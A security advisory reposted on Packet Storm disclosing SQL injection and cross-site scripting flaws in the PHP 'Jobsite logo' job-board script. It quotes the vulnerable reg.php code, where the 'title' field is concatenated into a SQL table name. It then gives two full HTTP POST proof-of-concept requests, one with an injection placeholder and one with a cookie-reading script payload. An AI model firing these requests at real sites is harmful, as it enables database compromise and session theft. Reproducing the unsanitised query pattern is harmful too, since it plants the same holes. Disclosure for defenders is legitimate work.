Jobsite Logo suffers from cross site scripting and remote SQL injection vulnerabilities.
f5b281fa23163ff33cd4204b0ebdddfa490fec4c9fcb6e65a4b8ada7918abb2cJobsite logo - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/jobfinder/
####################################################################
VULNERABILITY
##############
/includes/reg.php (line 4-28)
$user=addslashes($_POST['user']);
$pass=addslashes($_POST['user_password']);
$email=$_POST['email'];
$pass2=addslashes($_POST['user_password2']);
$firstname=addslashes($_POST['firstname']);
$lastname=addslashes($_POST['lastname']);
$middlename=addslashes($_POST['middlename']);
$title=addslashes($_POST['title']);
$address=addslashes($_POST['address']);
$city=addslashes($_POST['city']);
if(isset($user) && isset($pass))
{
$email=addslashes($email);
if($pass2!=$pass)
{
echo "<script type='text/javascript'>javascript:alert('Passwords
doesnt match.');</script>";
exit;
}
$connection = new db();
$connection->connect();
$result = mysql_query("SELECT username FROM mobagi_".$title." WHERE
username='".$user."' ")or die (mysql_error());
#########
EXPLOIT
#########
[1] Post Sql Injection
======================
Note: enter the registration page[register.php] and register there , then
take the post code
POST /jobs/includes/reg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jobs/register.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
title=[SQL
INJECTION]&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=&Submit=Register
[2] Post Cross Site Scripting
===============================
POST /jobs/includes/reg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jobs/register.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
title=<script>alert(document.cookie);</script>&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=&Submit=Register
####################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=logo}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed